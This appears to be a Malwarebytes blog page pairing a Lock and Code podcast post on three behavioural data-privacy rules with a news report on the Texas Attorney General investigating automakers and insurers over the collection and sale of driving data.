It’s Data Privacy Week right now, and that means, for the most part, that you’re going to see a lot of well-intentioned but clumsy information online about how to protect your data privacy. You’ll see articles about iPhone settings. You’ll hear acronyms for varying state laws. And you’ll probably see ads for a variety of apps, plug-ins, and online tools that can be difficult to navigate.

So much of Malwarebytes—from Malwarebytes Labs, to the Lock and Code podcast, to the engineers, lawyers, and staff at large—work on data privacy, and we fault no advocate or technologist or policy expert trying to earnestly inform the public about the importance of data privacy.

But, even with good intentions, we cannot ignore the reality of the situation. Data breaches every day, broad disrespect of user data, and a lack of consequences for some of the worst offenders. To be truly effective against these forces, data privacy guidance has to encompass more than fiddling with device settings or making onerous legal requests to companies.

That’s why, for Data Privacy Week this year, we’re offering three pieces of advice that center on behavior. These changes won’t stop some of the worst invasions against your privacy, but we hope they provide a new framework to understand what you actually get when you practice data privacy, which is control.

You have control over who sees where you are and what inferences they make from that. You have control over whether you continue using products that don’t respect your data privacy. And you have control over whether a fast food app is worth giving up your location data to just in exchange for a few measly coupons.

Today, on the Lock and Code podcast, host David Ruiz explores his three rules for data privacy in 2025. In short, he recommends:

  1. Less location sharing. Only when you want it, only from those you trust, and never in the background, 24/7, for your apps.
  2. More accountability. If companies can’t respect your data, respect yourself by dropping their products.
  3. No more data deals. That fast-food app offers more than just $4 off a combo meal; it creates a pipeline into your behavioral data.

Tune in today to listen to the full breakdown.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Texas scrutinizes four more car manufacturers on privacy issues

The Texas Attorney General’s Office has started an investigation into how Ford, Hyundai, Toyota, and Fiat Chrysler collect, share, and sell consumer data, expanding an earlier probe launched last year into how modern automakers are potentially using customer driving data.

We’ve addressed cars and privacy at some length on Malwarebytes Labs and came to the conclusion—with the help of many experts in the field—that modern cars simply aren’t very good at it. Many politicians in the US agree with that point of view, too, as US senators have asked the Federal Trade Commission (FTC) to investigate car makers’ privacy practices.

As part of the investigation in Texas, the state’s Attorney General’s Office sent letters—or “notices”—to four automakers earlier this month, demanding written responses under oath.

The Notice delivered to Hyundai discusses “covered data,” which is defined as any information or data about a vehicle manufactured, sold, or leased by you, regardless of whether deidentified or anonymized. And selling data is defined as sharing, disclosing, or transferring of personal data in exchange for monetary or other valuable consideration by you to a third party.

The Notices sent to the car manufacturers are not all exactly the same, but it is clear what the Attorney General’s Office is after:

  • Methods of collection used.
  • Which third parties received the data and if any restrictions were placed on how the recipients used the data.
  • The number of affected customers.
  • How consent was obtained from these customers.

In April of 2024, Texas Attorney General Ken Paxton sent “civil investigative demands” to Kia, General Motors, Subaru and Mitsubishi seeking details of their data collection and sharing practices.

And in August, Paxton sued General Motors for selling customer driving data to third parties.

Only recently, we reported how the Attorney General also went after buyers of data such as the insurance company Allstate and its subsidiary Arity. Arity acts as a data broker that sold insurers information used to set insurance premiums. The car manufacturers involved in that complaint are Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram, but they were not named as defendants.

Paxton did single out a few mobile apps and warned them that they were violating Texas’ data privacy law. Those apps are: GasBuddy, Life360, Miles, MyRadar, SiriusXM and Tapestri.

An Allstate spokesperson stated that Arity “helps consumers get the most accurate auto insurance price after they consent in a simple and transparent way that fully complies with all laws and regulations.”

But according to the press release from the Attorney General, Allstate and other insurers used what the office alleges was covertly obtained data to justify raising Texans’ insurance rates.
